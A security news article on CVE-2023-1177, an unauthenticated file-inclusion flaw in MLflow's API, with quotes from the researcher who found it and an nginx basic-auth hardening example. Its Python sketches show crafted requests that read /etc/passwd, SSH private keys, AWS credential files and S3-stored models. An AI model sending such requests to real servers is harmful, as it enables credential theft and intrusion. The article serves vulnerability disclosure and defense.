The now-patched vulnerability in the popular MLflow platform could expose AI and machine-learning models stored in the cloud and allow for lateral movement.
By Lucian Constantin | CSO Senior Writer
MLflow, an open-source framework used by many organizations to manage their machine-learning experiments and record results, has received a patch for a critical vulnerability that could allow attackers to extract sensitive information, such as SSH keys and AWS credentials, from servers. The attacks can be executed remotely without authentication because MLflow doesn't implement authentication by default, and a growing number of MLflow deployments are directly exposed to the internet.
"Basically, every organization that uses this tool is at risk of losing their AI models, having an internal server compromised, and having their AWS account compromised," Dan McInerney, a senior security engineer with cybersecurity startup Protect AI, told CSO. "It's pretty brutal."
McInerney found the vulnerability and reported it privately to the MLflow project. It was fixed in version 2.2.1 of the framework, released three weeks ago, but the release notes don't mention the security fix.
MLflow is written in Python and is designed to automate machine-learning workflows. It has multiple components that allow users to deploy models from various ML libraries; manage their lifecycle, including model versioning, stage transitions, and annotations; track experiments to record and compare parameters and results; and even package ML code in a reproducible form to share with other data scientists. MLflow can be controlled through a REST API and a command-line interface.
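For a sense of the workflow, a minimal experiment-tracking sketch using MLflow's Python API might look like the following; the tracking-server URL and experiment name are placeholders, not from any real deployment:

```python
import mlflow

# Point the client at a (hypothetical) tracking server; by default,
# MLflow logs to a local ./mlruns directory instead.
mlflow.set_tracking_uri("http://mlflow.internal.example:5000")
mlflow.set_experiment("demo-experiment")

# Record hyperparameters and results so runs can be compared later in the UI
with mlflow.start_run():
    mlflow.log_param("learning_rate", 0.01)
    mlflow.log_metric("accuracy", 0.93)
```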
All these capabilities make the framework a valuable tool for any organization experimenting with machine learning. Scans using the Shodan search engine reinforce this, showing a steady increase in the number of publicly exposed MLflow instances over the past two years, with the current count sitting at over 800. However, it's safe to assume that many more MLflow deployments exist inside internal networks and could be reachable by attackers who gain access to those networks.
"We reached out to our contacts at various Fortune 500's [and] they've all confirmed they're using MLflow internally for their AI engineering workflow,' McInerney tells CSO.
The vulnerability found by McInerney is tracked as CVE-2023-1177 and is rated 10 (critical) on the CVSS scale. He describes it as local and remote file inclusion (LFI/RFI) via the API: a remote, unauthenticated attacker can send specially crafted requests to the API endpoint that force MLflow to expose the contents of any readable file on the server.
For example, the attacker can include JSON in the request body that sets the source parameter to any file they want on the server, and the application will return its contents. One obvious target is SSH keys, which are usually stored in the .ssh directory inside a user's home directory. Knowing the user's home directory in advance is not a prerequisite for the exploit, though, because the attacker can first read the /etc/passwd file, which is present on every Linux system and lists all users and their home directories. The other parameters sent as part of the malicious request don't need to reference anything that exists and can be arbitrary.
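To make the pattern concrete, here is a rough sketch in Python. The endpoint name, the fields other than source, and the target paths are assumptions for illustration; the exact route and any follow-up artifact-download step are not spelled out above:

```python
import requests

BASE = "http://mlflow-server.example:5000"  # placeholder target

# A model-versions-style request whose "source" points at a local file.
# Everything except "source" can be arbitrary and need not exist.
payload = {
    "name": "does-not-need-to-exist",
    "source": "/etc/passwd",  # step 1: enumerate users and home directories
}
resp = requests.post(
    f"{BASE}/api/2.0/mlflow/model-versions/create",
    json=payload,
    timeout=10,
)
print(resp.status_code, resp.text)

# Step 2: with a home directory learned from /etc/passwd, aim the same
# request at a sensitive file such as an SSH private key.
payload["source"] = "/home/ubuntu/.ssh/id_rsa"
```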
What makes the vulnerability worse is that most organizations configure their MLflow instances to use Amazon S3 for storing their models and other sensitive data. According to Protect AI's review of the configuration of publicly exposed MLflow instances, seven out of ten use AWS S3. This means attackers can set the source parameter in their JSON request to the s3:// URL of the bucket used by the instance and steal models remotely.
It also means that AWS credentials are likely stored locally on the MLflow server so the framework can access S3 buckets; these credentials typically live in a file called credentials inside the ~/.aws folder in the user's home directory. Exposure of AWS credentials can be a serious breach because, depending on the attached IAM policy, the credentials can give attackers lateral movement capabilities into an organization's AWS infrastructure.
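Under the same illustrative request pattern, only the source value changes; the bucket name and home directory below are made up:

```python
# Point "source" at the S3 bucket the instance uses, to pull stored models
payload["source"] = "s3://victim-mlflow-artifacts/models/"

# Or point it at the server's local AWS credentials file
payload["source"] = "/home/ubuntu/.aws/credentials"
```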
Requiring authentication to access the API endpoints would prevent exploitation of this flaw, but MLflow does not implement any authentication mechanism. Basic authentication with a static username and password can be bolted on by deploying a proxy server such as nginx in front of the MLflow server and forcing authentication through it. Unfortunately, almost none of the publicly exposed instances use such a setup.
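As a minimal sketch of that setup, the nginx configuration below proxies an MLflow server listening locally on port 5000 and enforces basic authentication; the hostname and file paths are examples, and TLS should be layered on in any real deployment:

```nginx
server {
    listen 80;
    server_name mlflow.internal.example;

    # Credentials file created with, e.g.: htpasswd -c /etc/nginx/.htpasswd mluser
    auth_basic           "MLflow";
    auth_basic_user_file /etc/nginx/.htpasswd;

    location / {
        # MLflow itself binds only to localhost, so the proxy is the sole way in
        proxy_pass http://127.0.0.1:5000;
        proxy_set_header Host $host;
    }
}
```

For this to help, MLflow would be started bound to the loopback interface (mlflow server --host 127.0.0.1) so that the authenticated proxy is the only path to it.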
"I can hardly call this a safe deployment of the tool, but at the very least, the safest deployment of MLflow as it stands currently is to keep it on an internal network, in a network segment that is partitioned away from all users except those who need to use it, and put behind an nginx proxy with basic authentication," McInerney says. "This still doesn't prevent any user with access to the server from downloading other users' models and artifacts, but at the very least it limits the exposure. Exposing it on a public internet facing server assumes that absolutely nothing stored on the server or remote artifact store server contains sensitive data."